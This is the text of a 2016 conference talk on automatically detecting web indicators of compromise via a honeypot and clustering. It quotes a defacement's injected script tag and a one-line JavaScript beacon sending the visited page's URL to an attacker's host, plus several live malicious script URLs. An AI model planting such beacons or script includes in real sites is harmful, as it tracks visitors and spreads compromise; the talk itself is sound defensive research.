automatic extraction of indicators of compromise for web applications (ruhrsec 2016)

Automatic Extraction of Indicators of Compromise for Web Apps

Dr.-Ing. Marco Balduzzi(with D. Balzarotti and O. Catakoglu @ WWW'16)

29th April 2016RuhrSec, Bochum

2

Who am I?

Sr. Research Scientist @ Trend Micro

Forward-Looking Threat Research (FTR) team

M.Sc. + Ph.D.

UniBG + iSecLab@EURECOM

Hackish and open-source enthusiast since 2002

Established presence in international conferences and committees

3

Indicators of Compromise (IOCs)

Used in incident response and computer forensics

Forensic artifacts

A system has been compromised or infected with malware

For example

Presence in Windows Registry

MD5 file in temporary directory

Unusual outbound network traffic

Log-in irregularities and failures

4

Topic of presentation

Extend the concept of IOCs to Web Applications

(& automatically detect them!)

8

A simple observation

When compromising a web application, attackers often rely on external content / accessory scripts

Are not necessarily per se malicious

Popular Javascript libraries, e.g. jQuery

Beautifiers that control the look&feel of the page, e.g. matrix-style background

Scripts that implement reusable functions, e.g. browsers fingerprinting

Their innocuous form make them “highly resilient” to traditional detection systems (scanners)

9

BUT…

Their presence can be used to precisely pinpoint compromised or harmful pages

(a Web Indicator of Compromise)

10

Example: r57 hacking group

...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>...

http://r57.gen.tr/yazciz/ciz.js

11

Example: r57 hacking group

...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>...

a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);

http://r57.gen.tr/yazciz/ciz.js

13

How do we know that a script is used

in a malicious context ?

i.e. “Is a valid IOC”

14

Data Collection

High-interaction web honeypot [1]

[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.

15

Extraction of Candidates

Automatically extract candidates from files uploaded and modified by attackers

Focus on JavaScript URLs

Can be applied to other resource types

Normally benign!

E.g., Blocking mouse right-click. Used by attackers to prevent page inspection

Content agnostic (impossible to tell)

Need to extend the analysis to the context

16

Searching the Web for Indicators

Public web pages including references to our indicators

Google did not help :(

Only indexes the content (intext:)

Meanpath.com

HTML/JS source-code support

Coverage of 200 million websites

17

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

18



Set of features:

Page Similarity

Maliciousness

19



Set of features:

Page Similarity

Maliciousness

Anomalous Origin

20



Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

21



Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

Security Forums

22

Experiments

Training data: Jan 2015 → April 2015

375 unique candidates (over a total of 2,765)

Population of 1 to 202 (manual vs automated attacks)

Clustering: unsupervised learning (k-means)

Weka framework

3 cluster categories: malicious, benign, undecided

Live experiment: May 2015 → August 2015 (4 months)

Automated detection via analysis framework

23

Live Experiment

303 unique candidates (2.5/day)

Automatically processed and assigned to the closed cluster

22 Benign indicators

96 Malicious indicators

90% were previously unknown or misclassified

¼ IOCs → visual effects: moving text, snow

185 insufficient information (rare scripts)

24

High Lifetime of Malicious Indicators

25

Use of trustworthy code-repositories

10% IOCs hosted on Google Drive/Code!

1 was online for over 2 years!

Last month: used in dozens of defaced websites and drive-by

26

Web Shells

Often deployed by attackers and hidden in defaced websites

Cases of password-protected logins [1]

Flagged as valid indicator

Cases of the r57shell script: feedback of defaced domains

[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com

27

Phishing

Common habit

Webmail portals of AOL and Yahoo

Reused the original JS files and hosted on the authoritative domain [1]

IOC included in pages hosted on different domains

Websites compromised by the same group [2]

Correctly classified as malicious indicator

[1] http://snsstatic.aolcdn.com/sns.v14r8/js/fs.js [2] http://www.ucylojistik.com/ and http://fernandanunes.com/

28

VisAdd Adware Campaign

http://4x3zy4qll8bu4n1j.netdnassl.com/res/helper.min.js

Installed on defaced webpages

TDS for affiliate programs

A.Visadd.com malware

Loads the same JS at client-side

600+ new infected users per day

29

Fake Charity Program

http://static.donationtools.org/widgets/FoxyLyrics/widget.js

Loaded via BHO in IE

Vittalia and BrowseFox malware

594 new infections per day

30

Mailers

Compromised sites [1] → SPAM mailing server

Alternative to BHS and botnet-infected machines

Use of Pro Mailer V2: PHP mailer

Copies of jQuery hosted on Google and Tumblr

Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners

Malicious use detected.

[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/

31

Limitations

Our approach relies on the attacker's deployment strategy and is content agnostic

Evasion techniques:

Inline code

One-time generated URLs

32

Conclusions

Introduced the concept of Web IOCs

Leveraged a honeypot for real-time identification

Benign content → undetected by traditional scanners

Use 'HTTP Referer' to discover compromises pages

By the same hacking group?

33

Thank you!

Dr.-Ing. Marco Balduzzi

@embyte

automatic extraction of indicators of compromise for web applications (ruhrsec 2016)

Internet